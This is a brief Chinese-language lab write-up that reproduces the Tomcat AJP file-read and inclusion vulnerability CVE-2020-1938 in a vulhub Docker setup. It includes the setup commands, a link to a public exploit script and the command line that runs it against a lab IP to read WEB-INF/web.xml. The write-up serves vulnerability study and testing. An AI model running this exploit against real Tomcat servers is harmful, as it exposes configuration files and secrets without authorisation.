Tomcat9 AJP 任意文件读取和文件包含漏洞(CVE-2020-1938)
1 在线漏洞解读:
https://vulhub.org/#/environments/tomcat/CVE-2020-1938/

2 环境搭建
cd /home/kali/vulhub/tomcat/CVE-2020-1938

2.1 修改端口8089

2.2 环境启动:
sudo docker-compose up -d
sudo docker ps -a
已启动:访问端口8089

3 漏洞复现
访问http://192.168.225.166:8089/看到Tomcat示例页面,其中还有一个AJP端口8009正在监听

需要使用到工具访问AJP协议
https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
┌──(kali💋kali)-[~/tools/apache-tomcat/CNVD-2020-10487-Tomcat-Ajp-lfi]
└─$ python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.225.166 -p 8009 -f WEB-INF/web.xml
成功查看到文件

此漏洞有局限性只能读取tomcat/webapps/ROOT/目录下的文件,不存在目录穿越问题…/…/…/…/…/etc/passwd

1431

被折叠的 条评论
为什么被折叠?



